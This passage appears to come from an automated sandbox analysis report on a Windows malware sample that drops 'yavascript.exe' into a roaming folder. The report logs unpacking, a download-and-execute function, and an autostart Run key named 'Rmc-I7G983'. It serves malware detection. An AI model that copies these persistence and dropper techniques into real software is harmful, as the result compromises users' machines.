            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msvcr100.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msvcr100.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: msvcr100.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeUnpacked PE file: 0.2.yPIOW6yoPi.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeUnpacked PE file: 17.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeUnpacked PE file: 20.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeUnpacked PE file: 38.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCE3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004567E0 push eax; ret 0_2_004567FE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0045B9DD push esi; ret 0_2_0045B9E6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00455EAF push ecx; ret 0_2_00455EC2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00433FF6 push ecx; ret 0_2_00434009
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00535B6A pushfd ; ret 0_2_00535B6B
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00532CF5 push es; ret 0_2_00532D02
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F724F push edx; retf 0_2_020F7252
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212425D push ecx; ret 0_2_02124270
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0211409D push esi; ret 0_2_0211409F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02146116 push ecx; ret 0_2_02146129
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02146A47 push eax; ret 0_2_02146A65
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02105EC9 push edi; ret 0_2_02105ECA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02105C73 push esp; ret 0_2_02105C74
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004567E0 push eax; ret 17_2_004567FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0045B9DD push esi; ret 17_2_0045B9E6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00455EAF push ecx; ret 17_2_00455EC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00433FF6 push ecx; ret 17_2_00434009
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_005F5B6A pushfd ; ret 17_2_005F5B6B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_005F2CF5 push es; ret 17_2_005F2D02
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0077409D push esi; ret 17_2_0077409F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007A6116 push ecx; ret 17_2_007A6129
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078425D push ecx; ret 17_2_00784270
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075724F push edx; retf 17_2_00757252
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007A6A47 push eax; ret 17_2_007A6A65
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00765C73 push esp; ret 17_2_00765C74
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00765EC9 push edi; ret 17_2_00765ECA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004567E0 push eax; ret 20_2_004567FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0045B9DD push esi; ret 20_2_0045B9E6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00455EAF push ecx; ret 20_2_00455EC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00433FF6 push ecx; ret 20_2_00434009
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00605B6A pushfd ; ret 20_2_00605B6B
            Source: yPIOW6yoPi.exeStatic PE information: section name: .text entropy: 7.875500118800945
            Source: yavascript.exe.0.drStatic PE information: section name: .text entropy: 7.875500118800945
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,0_2_00406128
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile created: C:\Users\user\AppData\Roaming\xenor\yavascript.exeJump to dropped file

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious names
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983Jump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BC4
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983Jump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983Jump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCE3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
